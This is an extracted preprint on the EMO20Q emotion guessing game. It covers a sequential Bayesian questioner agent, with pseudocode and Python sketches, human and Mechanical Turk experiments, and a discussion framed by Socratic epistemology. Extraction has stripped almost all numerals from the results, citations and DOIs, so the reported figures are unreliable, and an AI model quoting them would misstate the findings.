to avoid falling into the ad populem logical fallacy, we formulate the answer to the question “what is emotion?” not as a question of truth, but a question of knowledge and belief, i.e., an issue of epistemology as described in section , in effect skirting the question of ground truth, but asking other interesting questions: “what do people believe about emotions, how do they express these beliefs in language, and how do they justify their beliefs through question-asking behavior?” annotation tasks can be seen as a type of crowd-sourcing to find consensus about assigning emotionl labels to data. elicitation of subjects also has aspects of crowd-sourcing to experimentally observe a diversity of emotional behavior in response to experimentally controlled stimuli. it can be argued that compared with annotation and elicitation of emotional data emo q provides higher experimental validity and sensitivity and less experimental bias at the expense of experimental control and reliability. in terms of experimental design, the human-human emo q is a quasi-experiment or natural experiment, as opposed to a controlled experiment, which means that there is not a manipulation of variables made by the experimenters, but rather that these variables are observed as they vary naturally within the system. with annotation and elicitation tasks, experimenters can control the vocabulary of annotation labels and with elicitation tasks experimenters can control the stimuli that are presented. with this control, experiments are more easily repeated. in emo q, we did not control what emotion words or questions the subjects picked so for another population the results could vary, leading to less experimental reliability. however, trading off control and reliability leads to more experimental sensitivity and validity and less experimental bias. in emo q subjects can choose any words or questions they want and they communicate in a natural dialog setting. this way of characterizing emotion is closer to natural communication and more sensitive to nuances of meaning. when forced to annotate using a fixed vocabulary of emotion words, subjects are experimentally biased toward using that vocabulary. the automated dialog agent is one way to enforce more experimental control for emo q. because the agent’s behavior is programmed we can use this as a way to better control and replicate experiments. another way we aimed to improve experimental reliability is by prompting users to pick emotion words from three different difficulty classes. sections and further describe the computational model for the agent’s behavior and our experimental design. peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts . model bayesian models have been successfully applied to a wide range of human cognitive abilities (griffiths et al., ), including inductive inference of word meaning from corpora (steyvers et al., ) and experi- mental stimuli (xu and tenenbaum, ) and powering affective dialog agents (carofiglio et al., ). to our knowledge, this work is the first application of bayesian cognitive models for learning emotion words from dialog interaction. the model we use for the emo q questioner agent is a sequential bayesian belief update algorithm. this model fits the framework of socratic epistemology, as described in the introduction, because it combines the notion of belief and question-asking. 
intuitively, this algorithm instantiates an agent whose semantic knowledge is based on data from previous emo q matches. the agent begins a new match of emo q with a uniform belief about the emotion word to be guessed. based on the previous semantic knowledge, the agent asks questions and updates its belief based on each observation of the user's answers to the questions. while the emo q match is played, the observations are stored in the agent's episodic buffer (baddeley, ), also known as working memory. after the match, the agent updates its semantic knowledge using the results of the match, clears its episodic buffer, and is then ready to play again. the words in italics are high-level abstractions used to create a cognitive model for the agent, which is underlyingly implemented as a sequential bayesian statistical model. we ask that the reader keep this abstraction in his or her episodic buffer when reading the following description of the model's technical implementation.
the semantic knowledge described above is the conditional probability of observing a set of question-answer pairs given a hidden variable ranging over emotion words. this conditional probability distribution is estimated from the corpus of past human-human and human-computer emo q matches as follows. let e be the set of emotion words and let ε ∈ e be a categorical, bayesian (i.e., unobserved) random variable distributed over the set e. the probability of ε, p(ε), is the belief about the emotion word to be guessed. each question-answer pair from a match of emo q is considered an observation, or feature, of the emotion being predicted. thus, if q is the set of questions and a is the set of answers, then a question q ∈ q and an answer a ∈ a together compose the feature f = (q, a), i.e., f ∈ q × a. the conditional probability distribution p(f|ε), which represents the semantic knowledge, is estimated from the training data using a smoothing factor of . to deal with sparsity.
in this model we stipulate that the set of answers a consists of four discrete cases: "yes", "no", "other", and "none". when the answer contains either "yes" or "no", it is labeled accordingly; otherwise it is labeled "other". the feature value "none" is assigned to all the questions that were not asked in a given dialog. "none" can be seen as a missing feature, for cases where the absence of a feature may be important. for example, the fact that a certain question was not asked about a particular emotion may be due to the fact that the question was not relevant at a given point in the dialog. similarly, we stipulate that the questions can be classified into discrete classes, each specified through a semantic expression derived from the annotation of questions, as described in section . . for example, the question "is it a positive emotion?" is represented as the semantic expression "e.valence==positive". if the answer to this question was "maybe", the resulting feature would be represented as ('e.valence==positive', 'other').
using bayes rule and the independence assumption of the naïve bayes model, we can formulate the agent's belief about the emotion variable ε after observing features f_1, ..., f_t in one single batch, as opposed to sequentially (which will be formulated next):
p(\varepsilon \mid f_1, \ldots, f_t) = \frac{\left[\prod_{i=1}^{t} p(f_i \mid \varepsilon)\right] p(\varepsilon)}{\prod_{i=1}^{t} p(f_i)}   ( )
this is simply the formulation of naïve bayes, where in this case p(ε) is the prior probability of a player choosing a specific emotion word, \prod_{i=1}^{t} p(f_i \mid \varepsilon) is the likelihood of seeing the question-answer pairs given specific emotion words, and \prod_{i=1}^{t} p(f_i) is the probability of observing the question-answer pairs in general. in terms of the high-level cognitive model, the set of observed feature vectors f_1, ..., f_t is what was described as the agent's episodic buffer, p(f|ε) is the agent's semantic knowledge that relates question-answer features to emotion words, and p(ε) and p(ε | f_1, ..., f_t) are the agent's initial/prior and final/posterior beliefs, respectively.
in equation , the posterior belief of the agent about emotion e_k at time t, p(ε = e_k | f_1, ..., f_t), is computed only after the agent has asked all t questions. this model is known as naïve bayes. in contrast, the sequential bayes model that we use is dynamic: the agent updates its belief at each time point based on the posterior probability of the previous step, i.e., at time t,
p(\varepsilon \mid f_1, \ldots, f_t) = \frac{p(f_t \mid \varepsilon)\, p(\varepsilon \mid f_1, \ldots, f_{t-1})}{p(f_1, \ldots, f_t)}
when the game begins, the agent can start with a uniform prior on its belief of which emotion is likely, or it can use information obtained in previously played games. in the experiments of this paper, we use a uniform prior, p(ε = e_k) = 1/|e|, ∀k = 1, ..., |e|. we chose the uniform prior to initialize the agent because our training data contains many single-count training instances and because we want to examine how the system performs with fewer constraints. we introduce a new variable β_{t,k} = p(ε = e_k | f_1, ..., f_t) for the agent's belief about emotion k at time t and postulate that the agent's prior belief at a given time is the posterior belief of the previous step. then, the agent's belief unfolds according to the formula:
\beta_{0,k} = p(\varepsilon = e_k) = 1/|E|
\beta_{1,k} = \frac{p(f_1 \mid \varepsilon = e_k)}{p(f_1)}\, \beta_{0,k}
\beta_{t,k} = \frac{p(f_t \mid \varepsilon = e_k)}{p(f_1, \ldots, f_t)}\, \beta_{t-1,k}   ( )
decomposing the computation of the posterior belief allows the agent to choose the best question to ask the user at each turn, rather than having a fixed battery of questions. we define "the best question" at time t to be the question that is most likely to have a "yes" answer given the posterior belief at time t − 1, p(ε | f_1, ..., f_{t-1}):
\arg\max_{q \in Q}\; p\big((q, \text{'yes'}) \mid \varepsilon\big)\, p(\varepsilon \mid f_1, \ldots, f_{t-1})
this next-question criterion is a heuristic motivated by considering "yes" answers to be positive feedback that the agent is on the right track. while this heuristic worked well in practice, other next-question criteria are certainly possible, and this is an area for future research. at time t the agent asks the best question and takes the user's response as input. it then parses the input to classify it into one of {"yes", "no", "other"}. this information is then used to update the agent's posterior belief β_{t+1,k} about each emotion e_k ∈ e, which will then be used as the prior in the following step. the unfolding of the variable β in equation models the update of belief as it is justified by the agent's question-asking and the user's answers. it is this computational model of question-asking and belief update that represents the socratic epistemology for verbal emotional intelligence in a software agent.
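to make the estimation and update steps above concrete, the following is a minimal python sketch (not the authors' released implementation) of how the semantic knowledge p(f|ε) could be estimated from past matches with additive smoothing, and how a single sequential belief update could be applied. the corpus format, the smoothing constant of 0.5, and all function names are illustrative assumptions.

```python
from collections import defaultdict

ANSWERS = ("yes", "no", "other", "none")  # stipulated answer classes

def estimate_semantic_knowledge(matches, questions, smooth=0.5):
    """Estimate p(f | emotion) for features f = (question, answer).

    `matches` is assumed to be a list of (emotion, {question: answer}) pairs
    from past emo q games; `smooth` is an additive smoothing constant
    (the paper uses a small smoothing factor; 0.5 here is an assumption).
    """
    counts = defaultdict(float)   # (emotion, question, answer) -> count
    totals = defaultdict(float)   # (emotion, question) -> count
    for emotion, qa in matches:
        for q in questions:
            a = qa.get(q, "none")  # unasked questions become the 'none' feature
            counts[(emotion, q, a)] += 1.0
            totals[(emotion, q)] += 1.0

    def p_f_given_e(q, a, emotion):
        num = counts[(emotion, q, a)] + smooth
        den = totals[(emotion, q)] + smooth * len(ANSWERS)
        return num / den

    return p_f_given_e

def update_belief(belief, q, a, p_f_given_e):
    """One sequential Bayesian step: multiply by the likelihood and renormalize."""
    posterior = {e: b * p_f_given_e(q, a, e) for e, b in belief.items()}
    z = sum(posterior.values()) or 1.0   # normalizer plays the role of p(f_1..f_t)
    return {e: p / z for e, p in posterior.items()}
```

starting from a uniform belief and repeatedly calling update_belief with each observed (question, answer) pair reproduces the unfolding of β sketched in the equations above.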
table shows an example interaction between the automated emo q questioner agent and a human user, along with a trace of the agent's belief state that shows the justification of beliefs by question-asking. identity questions are a special type of question in which the agent makes a guess about the emotion. identity questions are chosen with the same best-question criterion as other questions but trigger a transition to a different dialog state. an affirmative answer to an identity question (e.g., "is it happy?") means that the agent successfully identified the user's chosen emotion. any other answer to an identity question will set the posterior probability of that emotion to zero, because the agent can then be sure it is not the emotion of interest.
the pseudo-code for the main loop of the adaptive bayesian agent is shown in algorithm . this automated, data-driven component was framed within a manually designed dialog graph, as shown in figure . the dialog graph is implemented as a generalized pushdown transducer. recall that a pushdown transducer is a transducer that determines its output symbol and next state based on its current state, the input symbol, and the top of its stack (allauzen and riley, ). a generalized pushdown transducer is a pushdown transducer that is not limited to only the top of the stack when determining the output and next state. this aspect is important in the question-asking loop because the stack represents the episodic memory, which stores the question-answer observations. otherwise, the agent could be implemented as a plain pushdown transducer.
algorithm : sequential bayesian emo q agent. f is the set of observable question-answer features, e is the set of previously seen emotion words, p(f|ε) is the semantic knowledge relating observed question-answer pairs to emotion words, and β_{t,k} is the belief about the emotion word indexed by k at time t. because the agent is playing a twenty questions game, d is set to 20, but this could be changed for the agent to generalize to different question-asking tasks.
  input: f = q × a, e, and p(f|ε)
  β_{0,k} ← 1/|e|, ∀k = 1, ..., |e|
  for i = 1 to d do
    q^{(i)} = argmax_{q ∈ q} p((q, 'yes') | ε) p(ε | f_1, ..., f_{i−1})
    print q^{(i)}
    a^{(i)} ← user's input answer
    f_i ← (q^{(i)}, a^{(i)})
    β_{i,k} ← β_{i−1,k} · p(f_i | ε = e_k) / p(f_1, ..., f_i), ∀k = 1, ..., |e|
    if (q^{(i)} is the identity question for e_k ∧ a^{(i)} = 'yes') then
      return: e* = e_k
    end if
    if (q^{(i)} is the identity question for e_k ∧ a^{(i)} = 'no') then
      β_{i,k} ← 0
    end if
  end for
  k* ← argmax_{k ∈ 1, ..., |e|} [β_{i,k}]
  e* ← e_{k*}
  return: most likely emotion given observations: e*
figure : dialog graph for the emo q questioner agent. the loop labelled "asking" represents the functionality described by the sequential bayesian belief model of equation and algorithm . the dialog graph is implemented as a generalized pushdown automaton, where the stack represents the agent's working memory of question-answer turns.
. experiments
the emo q experiments we conducted can be partitioned into human-human and human-computer experiments. section . will examine the data from the human-human experiments, which formed the initial corpus used to train the emo q question-asking agent. section . will focus on experiments with the question-asking agent described in section .
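the following is a hedged, self-contained python rendering of the main loop in the algorithm above (the "asking" loop of the dialog graph). the identity-question handling and the turn limit of twenty follow the pseudocode; the best-question score marginalizes the yes-likelihood over the current belief, which is one reading of the criterion in the text; the parsing of free-text answers into {yes, no, other} is deliberately crude; and all function and variable names are illustrative rather than taken from the authors' code.

```python
def classify_answer(text):
    """Crude stand-in for the agent's answer parser."""
    t = text.lower()
    if "yes" in t:
        return "yes"
    if "no" in t:
        return "no"
    return "other"

def questioner_loop(emotions, questions, p_f_given_e, ask_user,
                    identity_of=None, max_turns=20):
    """Play the questioner role: ask up to `max_turns` questions, then guess.

    `ask_user(question)` returns the user's free-text answer;
    `identity_of(question)` returns the emotion named by an identity
    question (e.g., "is it happy?" -> "happiness") or None.
    """
    belief = {e: 1.0 / len(emotions) for e in emotions}       # uniform prior
    for _ in range(max_turns):
        # best question: most likely to receive a "yes" under the current belief
        q = max(questions,
                key=lambda q: sum(p_f_given_e(q, "yes", e) * belief[e]
                                  for e in emotions))
        a = classify_answer(ask_user(q))
        # sequential Bayesian update; renormalization stands in for p(f_1..f_t)
        belief = {e: belief[e] * p_f_given_e(q, a, e) for e in emotions}
        z = sum(belief.values()) or 1.0
        belief = {e: b / z for e, b in belief.items()}
        guess = identity_of(q) if identity_of else None
        if guess is not None:
            if a == "yes":
                return guess                   # success: emotion identified
            if guess in belief:
                belief[guess] = 0.0            # rule out a rejected guess
    return max(belief, key=belief.get)         # fall back to most likely emotion
```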
human-human emo q the human-human emo q results are described in an earlier conference paper (kazemzadeh et al., ) but we include a brief description because it is important for understanding the development of the automated agent. we collected a total of matches from players in the human-human experiments in which emo q was played over text chat. the emo q experiment was implemented as an online chat application using the extensible messaging and presence protocol (xmpp) and logged so that the games can be easily recorded and studied. early in our pilot studies, we realized that it was difficult to successfully terminate the game when the questioner guessed words that were synonyms of the that word the answerer picked. this led us to treat the phenomenon of synonyms with an additional rule that allowed the game to terminate if the answerer peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts could not verbally explain any difference between the two words. in this case, we considered the game to terminate successfully, but we flagged these matches and kept track of both words. of the matches played between the human players, – approximately % – terminated suc- cessfully with the questioner correctly identifying the emotion that the answerer picked or a word that the answerer felt was a synonym. the mean and median number of questions asked per game was . and , respectively, when failures to correctly guess the emotion were averaged in as questions. of the successfully terminated matches, terminated with synonyms. the unsuccessfully termi- nated matches that were considered failures consisted of several distinct cases. the questioner player could give up early if they had no clue ( / ), they could give up at twenty questions ( / ), or they could pass twenty questions due to losing count or as a matter of pride ( / ). the four remaining cases were considered failures because the answerer inadvertently gave away the answer due to a typing error or giving an unduly generous hint. there were unique words that players chose in the human-human games, of which were correctly identified. these are listed in table . there was a total of question-asking events. of the questions, were unique ( after normal- izing the questions for punctuation and case). in table we list some of the questions that occurred more than once. since the surface forms of the questions vary widely, we used manual preprocessing to standardize the questions to a logical form that is invariant to wording. this logical form converted the surface forms to a pseudo-code language by converting the emotion names to nouns if possible, standardizing attributes of emotions and the relations of emotions to situations and events. examples of the standardized questions are shown in table . after this semantic standardization, there were a total of question types. . . human-computer emo q using the human-human data described earlier in section . and the computational model and algorithm described in section , we built a computer agent to play the questioner role in emo q games. the emo q dialog agent was implemented using a server-side web application that maintained the belief state and episodic buffer for each open connection. the belief state was serialized to emotionml (schröder et al., ; burkhardt et al., ) and saved in a session database between each question-answer turn. 
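a minimal sketch of how per-session state could be kept between turns is shown below. it assumes a simple sqlite session store and an emotionml-like xml serialization of the belief distribution; the exact markup, category set, and storage backend used by the deployed agent are not specified in the text, so both are illustrative assumptions.

```python
import sqlite3
from xml.sax.saxutils import quoteattr

def belief_to_emotionml(belief):
    """Serialize a belief distribution to an EmotionML-style document.

    EmotionML represents emotions as <emotion> elements with <category>
    children; required attributes such as the category set are abbreviated here.
    """
    rows = "".join(
        '  <emotion><category name=%s value="%.4f"/></emotion>\n'
        % (quoteattr(word), prob)
        for word, prob in sorted(belief.items(), key=lambda kv: -kv[1]))
    return ('<emotionml xmlns="http://www.w3.org/2009/10/emotionml">\n'
            '%s</emotionml>' % rows)

def save_turn(db_path, session_id, turn, belief, episodic_buffer):
    """Persist the agent's belief state and episodic buffer for one turn."""
    conn = sqlite3.connect(db_path)
    conn.execute("CREATE TABLE IF NOT EXISTS turns "
                 "(session TEXT, turn INTEGER, belief_xml TEXT, buffer TEXT)")
    conn.execute("INSERT INTO turns VALUES (?, ?, ?, ?)",
                 (session_id, turn, belief_to_emotionml(belief),
                  repr(episodic_buffer)))
    conn.commit()
    conn.close()
```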
to test the proposed model of socratic epistemology for verbal emotional intelligence, we conducted two experiments to assess the performance of the agent. the first experiment was a small pilot study of subjects who played three matches against the agent (kazemzadeh et al., ). in the pilot study, the subjects were recruited locally. subjects were asked to pick three emotion words, one that they thought was “easy”, one that was “medium”, and a third that was “difficult”. these difficulty ratings were described in terms of a person’s maturity and vocabulary: an “easy” emotion word was one that a child could guess, whereas a “difficult” word was one that would require maturity and a sophisticated vocabulary to guess. the peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts pilot study was designed to assess the feasibility of the agent design but did not use training beyond the original human-human data. the second experiment was a larger experiment that forms the key experimental contribution reported by this paper. it followed the same methodology as the pilot study, but with subjects recruited from amazon mechanical turk. these subjects were selected to come from the united states, speak english fluently, and have high past acceptance rates as mechanical turkers. in the second experiment, the parameters of the model were updated every ten subjects. thus, there were ten waves of ten subjects, each playing matches against the automated agent, which yielded matches. after each ten subjects, the model described in section was updated based on the total counts of the corpus to that point. in addition to updating the probabilities of the models semantic knowledge (likelihoods), new vocabulary items were added if encountered. . results the results of our pilot experiments on fifteen subjects are summarized in table . to compare the agent’s performance with human performance, we used two objective measures and one subjective measure. the success rate, shown in column two of table , is an objective measure of how often the emo q matches ended with the agent successfully guessing the user’s emotion. the number of turns it took for the agent to guess the emotion is the other objective measure. the last column, naturalness, is a subjective measure where users rated how human-like the agent was, on a - scale. in the pilot study, the agent obtained a performance of % successful outcomes (where the emotion word was correctly guessed). this performance was much less than in the human-human experiments, where successful outcomes occurred in % of emo q matches. however, the results indicated that this performance was due to sparcity of data. the emotion words chosen by the subjects as “easy” were recognized by the agent with similar success rate and number of required turns as human-human matches. some examples of “easy” emotions are anger, happiness, and sadness. however, successful outcomes were fewer in emotions chosen as “medium” and “difficult”. some examples of “medium” emotions are contentment, curiosity, love, and tiredness. pride, frustration, vindication, and zealousness are examples of “difficult” emotions. overall, new emotion words were encountered in the pilot study. the results in terms of successful outcomes and number of turns required to guess the emotion word are roughly reflected in the percent of words that are in-vocabulary. 
despite the low performance on emotion words rated “medium” and “difficult”, there was not a corresponding decrease in the perceived naturalness of the questioner agent. this led us to believe that the model could reproduce somewhat natural behavior, but that the data we had was insufficient due to the amount of out-of-vocabulary words in the medium and difficult classes, which motivated us to perform the second, larger-scale experiment with players from peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts easy medium difficult p e r c e n t s u c c e s s experiment final pilot success rate easy medium difficult # t u r n s experiment final pilot average number of turns easy medium difficult p e r c e n t in - v o c a b . experiment final pilot in-vocabulary rate figure : results of initial automated agent pilot compared to the final experiment of matches on mechanical turk, in which the agent was retrained every matches. mechanical turk. in the larger scale mechanical turk experiment, we aimed to improve performance by retraining the model after each batch of subjects. this strategy did in fact increase the successful outcome rate and reduced the length of the emo q dialogs (number of questions), as can be seen from comparing tables and , which are visualized in figure . across all three difficulty classes, the successful outcome rate improved. the “difficult” class had the largest relative improvement in successful outcomes, increasing from % to %, and the overall successful outcome increased from % to %. the lengths of the emo q dialogs decreased most for the medium difficulty class, resulting in an average of . less turns for this class. overall, the decrease in dialog length decreased from . to . turns. one surprising result was that even after collecting data from emo q dialogs (more than doubling the earlier human-human data), the out-of-vocabulary rate stayed nearly the same. we had expected out-of vocabulary-words to become fewer as more data had been seen. however, with each round of the mechanical turk experiment, we continued to receive new emotion words rather than converging to a closed vocabulary. for the mechanical turk experiment, we did not ask subjects about the perceived naturalness of the agent in order to save on time, and hence costs to pay the turkers, so unfortuntately we cannot say whether the perceived naturalness increased. of the subjects, only one was rejected, due to misunderstanding the task by choosing the words “easy”, “medium”, and “difficult” instead of emotion words. this level of acceptance, approximately % is rather high for mechanical turk, showing a high degree of cooperation. several users commented that we could have paid less because the task was fun. a complete listing of the words chosen by the subjects of the experiment is given in table . it can be seen that there are a wide variety of words. a few (those marked by “?”) were questionable in the authors’ intuitions, but otherwise the words showed a high level of understanding and cooperation by the mechanical turkers. the three difficulty classes of words were not disjoint: some words like anger, disgust, love, and confusion spanned several categories. it can be concluded that these three difficulty levels do not form a peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . 
open access | rec: aug , publ: aug p re p ri n ts precise, natural classes of emotion words, but the levels do show a trend toward a smaller basic vocabulary and a wider open vocabulary. the difficulty levels also served as a method to elicit diverse words. the original human-human dialogs identified unique emotion words, after the pilot study there were unique emotion words, and after the large-scale mechanical turk experiment there were unique emotion words. . discussion the human-human emo q data abounds in highly nuanced natural language descriptions of emotion. for example, one human-human emo q game ended with a discussion of whether “pride” and “proud” refer to the same emotion: [regarding “proud” vs. “pride”] because my intuition was that they’re different... you know pride sometimes has a negative connotation in another human-human emo q dialog, a player had difficulty answering whether “anger” was a negative emotion: [questioner:] so is it a negative emotion? [answerer:] sort of, but it can be righteous in one human-computer game, one player differentiated the emotion of loving from the emotion of being loved and another player picked the emotion “maudlin”, which the authors needed to look up in a dictionary. given the highly nuanced, idiosyncratic descriptions in the human-human data, we were surprized at the amount of successful game outcomes in the human-human emo q games and we were initially unsure whether devising an automated agent would be feasible. although analyzing this level of detail is beyond the scope of many current systems, we saw that it is a task that humans can do with high success rates. in fact the successful outcome rates in the human-human emo q games are comparable to agreement rates on emotional annotations at a much coarser level, such as labeling data with nine basic emotion labels (busso et al., ). the human-computer results showed us that it possible for computer agents to perform well at the questioner role of emo q and moreover that the agent can learn new vocabulary items and improve its performance past the human-human bootstrap data. the fully trained agent successfully completed % of the emo q games, which is % of human-human performance and % better than the bootstrapped agent. the agent’s emotion word vocabulary nearly doubled after the mechanical turk experiment. normally larger emotion vocabularies results in less agreement in annotation tasks but this showed that in the emo q dialog task, vocabulary size is not a weakness but rather a strength. even when the agent fails to guess the human opponent’s emotion word in the emo q game, the agent’s behavior of searching for knowledge peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts makes it appear human-like, which enables the agent maintain user engagement and learn from new, out-of- vocabulary words. the ground truth issue involved in annotating recorded data with descriptive labels is a challenge that the socratic epistemology can shed light on. the traditional annotation task seeks to have human annotators assign one of a number of labels to data. in the case of emotion research, usually the labels are a controlled vocabulary of several emotion descriptors, like “angry”, “happy”, “sad”, “disgusted”, “fearful”, “surprised”, and “neutral”. the problem with this approach is that these labels often do not fit realistic emotional data. 
theoretically, our approach addresses the issue of ground truth in the annotation task with the notion of epistemology, which frames the issue as justification of belief rather than ground truth. practically, our approach addresses the issue of non-prototypical emotions by enabling a more nuanced representation where the description is not a small, closed set of alternatives but rather an interactive process of communication over a large, open set of natural language descriptions. though this more nuanced view brings with it new challenges, we have shown the design of an intelligent dialog agent is a feasible way of dealing with these challenges. we plan to further continue this research in several ways. first, we hope to see the effect of modality on how people describe emotions in natural language. the current work was limited to text-based chat, so the paralinguistic data that may help to convey emotional information was minimized. including audio and video data may allow greater convergence of the players to agree upon the unknown emotion in emo q. another area of future research will be to model the answerer role. the current research focused on the questioner role, but the answerer role will offer additional challenges and insights. in particular, automating the answerer role will require more robust natural language understanding because it will need to process to new, unseen questions from users, whereas the questioner used a fixed set of questions and only had to process answers to yes/no questions. the answerer would also likely require a different model than the socratic, question-asking model presented in this paper. a successful answerer agent would allow a pleasing closed-loop simulation where both roles of emo q are played by computer. there are also further areas to explore for the questioner agent, in particular, the criterion for choosing each question. finally, we think that this approach can improve emotion annotation and other annotation tasks, such as coding behavioral data for psychological assessment. in these tasks human annotators are aksed to label data using a controlled vocabulary of words and agreement is established statistically between isolated annotators. however, we have shown that humans are able to communicate with high accuracy using a large, subjective vocabulary and we feel that allowing natural language descriptions in an interactive, question-asking setting will allow for more accurate and less constrained annotations. peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts . conclusion the main goals of this paper were to formulate a theoretical and computational model for a subset of human emotional language. we called this model the socratic epistemology for verbal emotional intelligence because uses question-asking to justify beliefs about emotions in a natural language dialog context. we presented the emotion twenty questions (emo q) game and showed that the level of human performance was high despite not limiting the players to any predefined emotion vocabulary. we also presented an automated agent that can play the question-asking role of emo q. this agent uses a sequential bayesian belief update algorithm to simulate a cognitive processing by which the agent updates its belief state of candidate emotion words over time. 
this framework was inspired by a method of question-asking that was proposed by the ancient philosopher socrates and the field of epistemology: [gorgias:] just as different drugs draw forth different humors from the body – some putting a stop to disease, others to life – so too with words: some cause pain, others joy, some strike fear, some stir the audience to boldness, some benumb and bewitch the soul with evil persuasion” (gorgias, encomium of helen, c. b.c.). socrates: you, gorgias, like myself, have had great experience of disputations, and you must have observed, i think, that they do not always terminate in mutual edification, or in the definition by either party of the subjects which they are discussing;. . . now if you are one of my sort, i should like to cross-examine you, but if not i will let you alone. and what is my sort? you will ask. i am one of those who are very willing to be refuted if i say anything which is not true, and very willing to refute any one else who says what is not true, and quite as ready to be refuted as to refute. (plato, gorgias, b.c.) in the first quote above, gorgias, a sophist rhetorician, describes the effects of words on a person’s emotions. gorgias describes emotions by making reference to the theory of physiological humors. humankind’s con- ception of emotions has changed since the time of the ancients, who believed that emotions were generated from bodily “humors”, which in turn were derived from alchemical elements, but our conception of emotion is still largely expressible through language. in the second quote, socrates (as quoted by plato) cross-examines gorgias to determine gorgias’ beliefs. socrates applied his method of question-asking to understand beliefs about complex abstract concepts that were disputed in ancient times. two millenia later we have used a computational implementation of this method to make a dialog agent better understand human beliefs about emotional concepts. we have provided an anonymized version of data we gathered from emo q, source code for the exper- iments, demos, and other resources at http://sail.usc.edu/emo q . peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts . references cyril allauzen and michael riley. a pushdown transducer extension for the openfst library. in proceedings of the conference on implementation and application ofautomata, . allan d. baddeley. the episodic buffer: a new component of working memory? trends in cognitive science, ( ): – , . lisa feldman barrett. are emotions natural kinds? perspectives on psychological science, ( ): – , march . felix burkhardt, christian becker-asano, edmon begoli, roddy cowie, gerhard fobe, patrick gebhard, abe kazemzadeh, igmar steiner, and tim llewellyn. application of emotionml. in emotion, social signals, sentiment, and linked open data (es lod) , . carlos busso, murtaza bulut, chi-chun lee, abe kazemzadeh, emily mower, samuel kim, jeannette chang, sungbok lee, and shrikanth narayanan. iemocap: interactive emotional dyadic motion capture database. journal of language resources and evaluation, ( ): – , . valeria carofiglio, fiorella de rosis, and nicole novielli. cognitive emotion modeling in natural language communication, pages – . springer, . umberto eco and thomas a. sebeok, editors. the sign of three: dupin, holmes, peirce. advances in semiotics. indiana university press, . brandy n. frazier, susan a. gelman, and henry m. wellman. 
preschoolers’ search for explanatory infor- mation within adult-child conversation. child development, ( ): – , november/december . thomas l griffiths, charles kemp, and joshua b tenenbaum. bayesian models of cognition. cambridge university press, . jaakko hintikka. socratic epistemology: explorations of knowledge-seeking by questioning. cambridge university press, . charles f. hockett and stuart altmann. a note on design features, pages – . indiana university press, . jeff howe. the rise of crowdsourcing. wired magazine, . , june . sep kamvar and jonathan harris. we feel fine: an almanac of human emotion. scribner, . abe kazemzadeh. natural language description of emotion. phd thesis, university of southern california, . peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts abe kazemzadeh, panayiotis g. georgiou, sungbok lee, and shrikanth narayanan. emotion twenty ques- tions: toward a crowd-sourced theory of emotions. in proceedings of acii’ , . abe kazemzadeh, james gibson, juanchen li, sungbok lee, panayiotis g. georgiou, and shrikanth narayanan. a sequential bayesian agent for computational ethnography. in proceedings of interspeech, portland, or, october . brian king. the conceptual structure of emotional experience in chinese. phd thesis, ohio state univer- sity, . rada mihalcea and hugo liu. a corpus-based approach to finding happiness. in aaai spring symposium on computational approaches to weblogs, march . url http://www.cse.unt.edu/~rada/papers/ mihalcea.aaaiss .pdf. emily mower, angeliki metallinou, chi-chun lee, abe kazemzadeh, carlos busso, sungbok lee, and shrikanth narayanan. interpreting ambiguous emotional expressions. in acii special session: recognition of non-prototypical emotion from speech- the final frontier?, amsterdam, netherlands, . charles sanders peirce. some consequences of four incapacities. journal of speculative philosophy, : – , . url http://www.iupui.edu/~peirce/writings/v /w /w _ /v _ .htm. edmond t. rolls. what are emotions, why do we have emotions, and what is their computational basis in the brain, chapter , pages – . oxford university press, . bertrand russell. on denoting. mind, : – , . marc schröder, paolo baggia, felix burkhardt, catherine pelachaud, christian peter, and enrico zovato. w c candidate recommendation: emotion markup language (emotionml) . , may . url http: //www.w .org/tr/emotionml/. http://www.w .org/tr/emotionml/. phillip r. shaver, upekkha murdaya, and r. chris fraley. structure of the indonesian emotion lexicon. asian journal of social psychology, : – , . mark steyvers, thomas l griffiths, and simon dennis. probabilistic inference in human semantic memory. trends in cognitive sciences, ( ): – , . luis von ahn and laura dabbish. labeling images with a computer game. in proceedings of the sigchi conference on human factors in computing systems, . fei xu and joshua b tenenbaum. word learning as bayesian inference: evidence from preschoolers. in proceedings of the twenty-seventh annual conference of the cognitive science society, . peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . 
open access | rec: aug , publ: aug p re p ri n ts http://www.cse.unt.edu/~rada/papers/mihalcea.aaaiss .pdf http://www.cse.unt.edu/~rada/papers/mihalcea.aaaiss .pdf http://www.cse.unt.edu/~rada/papers/mihalcea.aaaiss .pdf http://www.iupui.edu/~peirce/writings/v /w /w _ /v _ .htm http://www.w .org/tr/emotionml/ http://www.w .org/tr/emotionml/ http://www.w .org/tr/emotionml/ ning zhong, jiming liu, y.y. yao, and s. ohsuga. web intelligence. in computer software and applications conference, . zoltán kövecses. metaphor and emotion: language, culture, and body in human feeling. cambridge university press, . peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts table : example dialog from emo q questioner agent where the human interlocutor has chosen “relaxation”. speaker/event utterance/content agent let me know when you are ready... user ok belief update (uniform distribution) agent is it very intense? user no belief update relaxation: . , hope: . , boredom: . , ..., anger: . agent is it positive? user yes belief update hope: . , relaxation: . , cheerfulness: . , ... agent is it an emotion that just pops up spontaneously (vs being triggered by something)? user depends belief update hope: . , relaxation: . , cheerfulness: . , ... agent is it caused by something in particular? user well, yes, you do need the right conditions belief update relaxation: . , hope: . , cheerfulness: . , ... agent is it relaxation? user yes agent so did i get it right? user yes, you got it agent awesome! would you like to play again? user no, thanks. agent thank you for playing peerj preprints | https://dx.doi.org/ . 